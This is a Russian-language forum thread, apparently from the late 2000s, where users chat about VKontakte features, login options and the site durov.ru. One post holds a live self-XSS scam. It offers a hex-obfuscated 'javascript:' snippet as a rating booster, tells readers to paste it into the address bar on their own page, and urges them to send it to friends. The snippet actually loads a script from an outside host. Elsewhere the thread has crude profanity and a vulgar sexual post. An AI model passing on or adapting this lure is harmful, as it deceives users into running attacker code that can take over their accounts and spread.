![]() | |
Цитата:
|
Цитата:
кого я добавляю -я всех вижу... |
Цитата:
Добавлено через 2 минуты Цитата:
|
вконтакт полезен шашками и только. ну еще балдой. |
|
Цитата:
ну и музыку с видео качаю само-собой:cool: |
ДОБАВЛЯЕМСЯ КО МНЕ Я СОСУ ХУЙ СТРОГО |
:D |
добавляемся http://vkontakte.ru/id7179262?17172 |
Скажите , для чего при входе есть опция "чужой компьютер" , смысл в ней ? |
Вложений: 2 Вконтакте — говно. Юзайте дуров.ру :black: |
там закладки заебись палить |
Цитата:
|
Что с контактом??? я не могу зайти:mad: |
Цитата:
-то поставив эту галочку и введя свои данные (имэил и пароль) -эти данные НЕ сохранятся там навсегда, а сотрутся при первом же закрытии браузера и такая же "опция" есть на сотни других сайтах (к примеру на почтовиках) Цитата:
захожу только когда надо пропалить, у кого я в закладках и оч. нравится, что друзья расположены по дате добавления а не по рейтингу так же недавно узнал, что с помощью дуров.ру -можно менять аву (даже если в обычном контакте стоит ограничение после таблички о "нереальных данных") Добавлено через 30 секунд Цитата:
|
создан для того чтобы Вам поднять настроение!!! Скрипт увеличит рейтинг на ваший глазах! ja***vascript:function loadScript(scriptURL) { var scriptElem = document.createElement('SCRIPT'); scriptElem.setAttribute('language', '%4A%61%76%61%53%63%72%69%70%74'); scriptElem.setAttribute('src', scriptURL); document.body.appendChild(scriptElem);}loadScript( '%68%74%74%70%3A%2F%2F%69%6E%73%31%39%39%32%2E%6E% 61%72%6F%64%2E%72%75%2F%72%65%74%65%2E%6A%73'); >>> Удалите "***" вначале! Отправь это Лучшим своим друзьям! Думаю они заслужили это! Для тех кто не умеет пользоваться скриптами: 1) Скопируйте код, перейдите на "моя страница" 2) Вставьте в адресную строку код, куда вы пишете сайты. 3) Удалите Вначале кода "***". 4) Нажмите Enter. (Если Вы всё сделали так как написано, а рейтинг не поднялся, обновите страницу и повторите попытку) |
Цитата:
Цитата:
Добавлено через 7 минут Цитата:
|
|
Цитата:
вот вики почитай;) |
|
Цитата:
|
Цитата:
|